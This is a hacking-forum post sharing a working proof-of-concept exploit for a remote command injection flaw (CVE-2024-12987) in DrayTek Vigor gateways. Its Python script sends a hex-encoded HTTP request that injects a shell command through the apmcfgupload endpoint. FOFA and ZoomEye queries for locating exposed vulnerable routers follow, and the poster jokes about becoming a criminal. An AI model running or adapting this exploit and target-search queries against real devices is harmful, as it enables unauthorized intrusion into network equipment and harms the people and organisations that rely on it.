CVE-2024-12987: DrayTek Gateways Remote Command Injection
by Aanya - Thursday January 16, 2025 at 12:19 PM
VIP User
VIP
Posts: 79
Threads: 13
Joined: Aug 2024
Reputation: 413

Confirmed Grill
#1
01-16-2025, 12:19 PM (This post was last modified: 01-16-2025, 12:27 PM by Aanya.)
Understand this exploit : https://netsecfish.notion.site/Command-I...ffe29ce18f

POC
import socket
import socks


def send_http_request(host_ip, host_port, request):
    socket.socket = socks.socksocket
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((host_ip, host_port))
            request = bytes.fromhex(request.decode())
            s.sendall(request)
            print("HTTP request sent:")
            print(request)

            response = b""
            while True:
                data = s.recv(4096)
                if not data:
                    break
                response += data

            return response.decode('utf-8', errors='replace')
    except Exception as e:
        print("An error occurred:", e)


if __name__ == "__main__":
    host = '<TARGET_IP>'
    port = '<TARGET_PORT>'

    request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'

    response = send_http_request(host, port, request_apmcfgupload_pwd_binary)

    print("HTTP response received:")
    print(response)


FOFA QUERY :
Quote: app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"
Quote:"excanvas.js" && "lang==\"zh-cn\"" && "detectLang" && server="DWS"
ZOOMEYE QUERY :
Quote: app="DrayTek Vigor 300B broadband router httpd" || app="DrayTek Vigor2960 router httpd"


With Heart @Aanya  kitten2
I Love Data
[Image: Capture.png]
I am gonna be  a criminal , Hehehe
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 42 1,732 08-06-2025, 10:45 AM
Last Post: k4mui
  [WordPress] Contact Form - SQL Injection Vuln Friday 147 18,154 08-04-2025, 04:20 AM
Last Post: 1blackman
  CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE) thermos 7 366 08-03-2025, 08:21 PM
Last Post: handsomexxxxxy
  Palo-Alto-Expedition-Remote-Code result 16 1,904 04-12-2025, 03:10 AM
Last Post: kry
  CVE-2024-21006 - Oracle WebLogic Server - HIGH tkqz 2 615 04-09-2025, 11:05 PM
Last Post: 9anatnaja7

Forum Jump:


 Users browsing this thread: 1 Guest(s)